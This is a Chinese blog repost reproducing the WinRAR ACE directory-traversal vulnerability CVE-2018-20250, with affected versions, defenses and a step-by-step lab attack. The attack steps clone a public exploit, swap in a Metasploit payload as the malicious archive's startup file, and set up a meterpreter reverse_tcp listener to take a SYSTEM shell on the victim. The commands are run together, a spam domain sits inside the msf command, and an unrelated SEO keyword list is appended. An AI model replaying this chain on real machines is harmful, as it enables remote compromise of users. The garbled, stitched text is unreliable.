WinRAR目录穿越漏洞
发表于:2024-10-20 作者:千家信息网编辑
千家信息网最后更新 2024年10月20日,该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE
千家信息网最后更新 2024年10月20日WinRAR目录穿越漏洞复现环境
https://github.com/WyAtu/CVE-2018-20250/ 复现过程
漏洞防御
该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行
漏洞编号: CVE-2018-20250
影响版本:
WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩 < = 4.0.0.1170
exp下载:
1.使用Metasploit生成Payload
2.使用exp生成恶意程序
cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
将exp.py中的evil_filename = "calc.exe"改为"WinRAR.exe"
将CVE-2018-20250文件夹复制到Windows10中执行
3.在靶机上运行恶意程序
将test.rar 投放到win8上 解压运行
4.在kali上监听metasploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com
5.控制靶机
Win8重启之后 kali会接受到会话 此时执行shell
进入到win8系统的system权限
1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御
2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1
3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本
漏洞
文件
动态
服务器
版本
过程
链接
服务
目录
恶意
程序
靶机
处理
影响
生成
运行
防御
有效
陈旧
代码
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
数据库 导入已有
wex5写入数据库
计算机数据库安全测试
网络安全校园贷款ppt
支付宝数据库分析
数据库连接延迟无法登录
菲律宾高防服务器
苹果手机接受不到服务器是什么原因
服务器安全的三要素
电话打出去显示服务器错误
监控服务器上传流量
网络安全诵读诗
湖北小学生网络安全教育视频
东莞企学宝培训软件开发
欧洲学习软件开发的学校
软件开发场应该建在什么旁边
我的世界网易版服务器金币
做软件开发的有前途吗
2018年网络安全主题
网络安全管理工作规章制度
泛微网络安全教育
菏泽市网络安全和信息化
服务器磁盘格式化
数据库技术与应用sql语句
服务器安全狗 怎么样
用cad画服务器
网络安全知识的培训心得体会
小蜜蜂服务器怎么骑人
医院网络安全应急处置
西安 集装箱物流 软件开发